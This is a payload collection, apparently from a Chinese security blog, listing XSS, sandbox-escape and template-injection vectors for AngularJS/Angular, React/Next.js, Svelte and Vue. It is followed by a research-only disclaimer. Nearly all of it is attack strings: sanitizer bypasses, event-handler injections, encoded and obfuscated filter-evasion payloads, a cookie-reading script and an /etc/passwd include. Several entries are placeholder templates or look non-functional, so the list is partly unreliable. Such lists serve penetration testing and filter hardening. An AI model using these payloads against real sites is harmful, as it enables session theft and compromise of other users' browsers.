Angular Payload
angularjs:
# AngularJS 沙箱逃逸技术
sandbox_escape:
- "{{constructor.constructor('alert(1)')()}}"
- "{{ (_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value, 'alert(1)' )() }}"
- "{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].__proto__,a).value, 'alert(1)')()}}"
# 危险方法调用
unsafe_methods:
- "$eval('alert(1)')"
- "$evalAsync('alert(1)')"
- "$apply('alert(1)')"
# 过滤器滥用
filter_exploit:
- "{{'a'|orderBy:'alert(1)'}}"
- "{{'a'| filter: 'x=alert(1)'}}"
angular:
# 安全上下文绕过
sanitizer_bypass:
- "bypassSecurityTrustHtml('<img src=x onerror=alert(1)>')"
- "bypassSecurityTrustScript('alert(1)')"
- "bypassSecurityTrustUrl('javascript:alert(1)')"
# 模板注入
template_injection:
- "<div [innerHTML]='${payload}'></div>"
- "<div innerHTML='{{ ${payload} }}'></div>"
- "<script type='text/ng-template'>${payload}</script>"
# Zone.js 相关漏洞
zone_js_exploits:
- "Zone.current.fork({}).run(() => { ${payload} })"
- "NgZone.runOutsideAngular(() => { ${payload} })"
# 服务端渲染 (SSR) 攻击
ssr_attack:
- "</xmp><script>alert(1)</script>"
- "<div>{{ 'a'.constructor.prototype.charAt=[].join;$eval('x=1') }}</div>"
# 属性绑定攻击
attribute_binding:
- "<a [attr.href]='${payload}'>click</a>"
- "<img [attr.src]='${payload}'>"
# 事件绑定攻击
event_binding:
- "<button (click)='${payload}'>"
- "<div (mouseover)='${payload}'>"
# 现代漏洞模式 (Angular 12+)
modern_exploits:
- "{{ $any({}).constructor.constructor('alert(1)')() }}"
- "<iframe [srcdoc]='${payload}'></iframe>"
- "<object [data]='${payload}'></object>"
# 依赖注入滥用
dependency_injection:
- "constructor(private sanitizer: DomSanitizer) { sanitizer.bypassSecurityTrustHtml(${payload}) }"
- "@Injectable({ providedIn: 'root' }) class ExploitService { constructor() { ${payload} }"
# 服务端模板注入
ssti:
- "{{ 7 * 7 }}<%= 7 * 7 %>"
- "{{ config.__proto__.ENV = {}; ${payload} }}"
# 编码混淆策略
encoding_strategies:
angular_specific:
# 模板表达式混淆
- "{{ 'a'.constructor.prototype.charAt=[].join; $eval('x=${payload}') }}"
# Unicode 转义
- "\u007B\u007B alert(1) \u007D\u007D" # {{ alert(1) }}
# 字符插入混淆
- "{{ 'a'|orderBy:'al'%2b'ert(1)' }}"
# 混合编码
- "<div [innerHTML]='${payload|base64}'></div>"
# 上下文敏感检测规则
context_rules:
template_expression:
detection_patterns:
- "\\{\\{.*\\}\\}"
- "\\[\\(].*="
injection_points:
- "innerHTML"
- "href"
- "style"
security_sensitive:
dangerous_methods:
- "bypassSecurityTrust"
- "renderer2.createElement"
- "ElementRef.nativeElement"
# 版本特征检测
version_detection:
angularjs_signatures:
- "ng-app"
- "data-ng-"
- "ng-controller"
angular_signatures:
- "platformBrowserDynamic"
- "@Component"
- "CommonModule"
version_patterns:
- "X-Powered-By: Angular"
- /angular\/(\d+\.\d+\.\d+)/
React Payload
react_class:
# 类组件漏洞模式
dangerously_set_innerhtml:
- "{ __html: '<img src=x onerror=${payload}>' }"
- "{ __html: '<svg onload=${payload}>' }"
- "{ __html: '<iframe srcdoc=\"${payload}\">' }"
lifecycle_injection:
- "componentDidMount() { ${payload} }"
- "UNSAFE_componentWillReceiveProps() { ${payload} }"
ref_manipulation:
- "this.myRef.current.innerHTML = ${payload}"
- "ReactDOM.findDOMNode(this).innerHTML = ${payload}"
react_hooks:
# 函数组件 Hooks 利用
useEffect_exploit:
- "useEffect(() => { ${payload} }, [])"
- "useLayoutEffect(() => { ${payload} }, [])"
useRef_dom_injection:
- "const ref = useRef(); ref.current.innerHTML = ${payload}"
- "useImperativeHandle(ref, () => ({ exec: () => ${payload} }))"
state_callback:
- "setState(() => { ${payload} })"
- "useState(() => { ${payload} })"
jsx_injection:
# JSX 表达式注入点
expression_escape:
- "{${payload}}"
- "{JSON.stringify({ data: ${payload} })}"
attribute_injection:
- "style={{ color: ${payload} }}"
- "className={${payload}}"
- "data-payload={${payload}}"
spread_operator:
- "{...${payload}}"
- "<div {...${payload}} />"
nextjs:
# Next.js 特定漏洞
server_components:
- "'use client'; ${payload}"
- "export default function Page() { return (${payload}) }"
getServerSideProps:
- "export async function getServerSideProps() { ${payload} }"
- "export const getStaticProps = () => { ${payload} }"
edge_runtime:
- "export const config = { runtime: 'edge' }; ${payload}"
advanced:
# 高阶绕过技术
prototype_pollution:
- "Object.prototype.innerHTML = ${payload}"
- "this.__proto__.render = () => ${payload}"
jsx_function_exec:
- "{(_ => ${payload})()}"
- "{(() => ${payload})()}"
unicode_smuggling:
- "{\\u0061lert(1)}"
- "{['\\x61\\x6c\\x65\\x72\\x74'](1)}"
jsfuck_encoded:
- "{(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+([][[]]+[])[!+[]+!+[]]}"
legacy:
# 旧版本 React 漏洞
string_refs:
- "ref='${payload}'"
- "this.refs.${payload}.innerHTML = ''"
react_create_element:
- "React.createElement('div', { dangerouslySetInnerHTML: { __html: ${payload} }})"
- "ReactDOM.render(${payload}, document.body)"
# 混合攻击向量
polyglot:
hybrid_vectors:
- "');alert(1);('" # 闭合原有表达式
- "${payload} || alert(1)"
- "typeof ${payload} === 'function' && ${payload}()"
Svelte Payload
svelte3:
# 模板注入攻击向量
template_injection:
- "{@html '<img src=x onerror=alert(1)>'}"
- "{@html decodeURIComponent('%3Cscript%3Ealert(1)%3C/script%3E')}"
- "<div>{@html unsafeVariable}</div>"
# 事件处理器利用
event_handlers:
- "on:click={() => alert(1)}"
- "on:mouseover={e => prompt(1)}"
- "on:load={event => new Function('alert(1)')()}"
# 属性绑定绕过
attribute_binding:
- "<a href={javascript:alert(1)}>click</a>"
- "<iframe srcdoc={unescapedHTML}>"
- "<div bind:innerHTML={maliciousContent}></div>"
# 动态组件利用
dynamic_components:
- "<svelte:component this={componentWithXSS}/>"
- "<svelte:window on:keydown={handleKey}/>"
- "<svelte:body on:click={executePayload}/>"
# Store 存储系统利用
store_exploits:
- "$store.subscribe(value => eval(value))"
- "writable('alert(1)').update(v => eval(v))"
- "derived(stores, values => new Function(values))"
svelte4:
# 新版本特性利用
reactivity_bypass:
- "$effect(() => { ${payload} })"
- "$derived(() => { eval(inputValue) })"
- "<script rune> let { pwn = alert(1) } = $props() </script>"
# 服务端渲染 (SSR) 攻击
ssr_vectors:
- "{@html '<%%>'}<!--#include virtual=\"/etc/passwd\"-->"
- "<div data-sveltekit-fetched='javascript:alert(1)'></div>"
- "<svelte:head><!--{ '-->' + payload + '<!--' }--></svelte:head>"
# 编译时特性利用
compile_time:
- "<script context='module'>window.__payload = 'alert(1)'</script>"
- "<!--svelte-ignore a11y-click-events-have-key-events-->"
- "<div on:click={unsafeHandler}></div>"
# 通用绕过技术
common:
# 编码混淆技术
encoded_payloads:
- "JaVaScRiPt:alert(1)"
- "data:text/html;charset=utf-8,<script>parent.alert(1)</script>"
- "javascript:eval(String.fromCharCode(97,108,101,114,116,40,49,41))"
# DOM 破坏技术
dom_manipulation:
- "<script>document.currentScript.parentElement.innerHTML = '<img src=x onerror=alert(1)>'</script>"
- "<svelte:self let:props><script>props.execute()</script></svelte:self>"
# 异步执行技术
async_execution:
- "setTimeout(() => alert(1), 500)"
- "requestIdleCallback(() => { ${payload} })"
- "new SharedWorker('data:application/javascript,alert(1)')"
# 上下文敏感 Payload
context_sensitive:
html_element:
- "<script>console.log`${document.cookie}`</script>"
- "<style>@import url(javascript:alert(1));</style>"
attribute_context:
- "javascript:import('data:text/javascript,alert(1)')"
- "data:text/svelte,<svelte:options accessors/><script>export let pwn=alert(1);</script>"
template_literals:
- "`${alert(1)}`"
- "new Function`alert\\x28document.domain\\x29`"
# 高级混淆技术
advanced_obfuscation:
unicode_smuggling:
- "\u0061\u006c\u0065\u0072\u0074(1)"
- "<\u0073cript>alert(1)</script>"
comment_bypass:
- "<!-- --><script>alert(1)</script><!-- -->"
- "/**/eval/**/(atob('YWxlcnQoMSk='))/**/"
chunked_encoding:
- "<scri%0apt>aler%0at(1)</script>"
- "<svelte%3Acomponent this=window['al'+'ert']/>"
Vue Payload
vue2:
template_injection:
- "{{ _c.escape(_s(${payload})) }}" # 转义函数绕过
- "{{ constructor.constructor('alert(1)')() }}" # 构造器链利用
- "{{ _vm.$options.methods.__proto__.x = ${payload} }}" # 原型污染
directives:
v_html:
- "<div v-html='_c.escape(_s(${payload}))'></div>" # v-html 指令绕过
- "<component :is='${payload}'></component>" # 动态组件注入
v_bind:
- ":href='javascript:alert(1)'" # JavaScript协议绑定
- ":style='{color: ${payload}}'" # CSS注入
event_handlers:
- "@click='${payload}'" # 点击事件注入
- "@mouseover=\"${payload}\"" # 带引号的事件处理
- "v-on:focus='new Function(${payload})'" # 动态函数构造
filter_exploits:
- "{{ 'alert(1)' | filterFunction }}" # 过滤器参数注入
- "{{ _vm.$options.filters.__proto__.x = ${payload} }}" # 过滤器原型污染
ssr:
- "{{#with this}}<script>${payload}</script>{{/with}}" # Mustache 模板注入
- "<% ${payload} %>" # 服务端模板注入
vue3:
composition_api:
setup_script:
- "<script setup>${payload}</script>" # Setup语法糖注入
- "const exploit = () => eval(${payload})" # 箭头函数利用
reactivity:
- "ref(${payload})" # 响应式对象注入
- "window.__vue_app__.config.globalProperties.${payload}" # 全局属性污染
renderer:
- "createRenderer({ patchProp: ${payload} })" # 渲染器函数劫持
- "h('div', { innerHTML: ${payload} })" # VNode注入
modern_features:
suspense:
- "<Suspense><template #default>${payload}</template></Suspense>"
teleport:
- "<Teleport to='body'>${payload}</Teleport>"
ecosystem:
vue_router:
- "router.beforeEach((${payload}) => {})" # 路由守卫注入
- "this.$router.addRoutes([{ component: ${payload} }])"
vuex:
- "store.subscribeAction({ after: ${payload} })" # Action订阅攻击
- "this.$store._modules.root._rawModule.actions = ${payload}"
advanced_obfuscation:
unicode_escape:
- "\\u0061\\u006c\\u0065\\u0072\\u0074(1)" # alert的Unicode转义
- "\\x61\\x6c\\x65\\x72\\x74(1)" # Hex转义
string_concat:
- "aler" + "t(1)"
- "window['al' + 'ert'](1)"
template_literals:
- "alert`1`"
- "window[`al${'ert'}`](1)"
dependency_injection:
provide_inject:
- "provide('xss', ${payload})" # Provide漏洞
- "inject('xss')" # Inject触发
plugin_abuse:
- "app.use({ install: ${payload} })" # 插件安装攻击
- "app.mixin({ created: ${payload} })" # 全局混入
server_side:
nuxt_ssr:
- "<%= ${payload} %>" # Nuxt服务端模板
- "useAsyncData(() => ${payload})" # 异步数据注入
vuepress:
- "{{ $page.${payload} }}" # 主题变量注入
- "<ClientOnly>${payload}</ClientOnly>" # 客户端注入点
defense_evasion:
sanitizer_bypass:
- "{{ decodeURIComponent(${payload}) }}" # 解码函数绕过
- "<div v-html='bypassSanitization(${payload})'></div>"
sandbox_escape:
- "with(this){${payload}}" # with语句逃逸
- "Object.defineProperty(this, 'x', { value: ${payload} })"
最近时间安排比较紧张,整合了各种框架的payload。
4A评测 - 免责申明
本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。
不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。
本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。
如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!
程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。
侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)
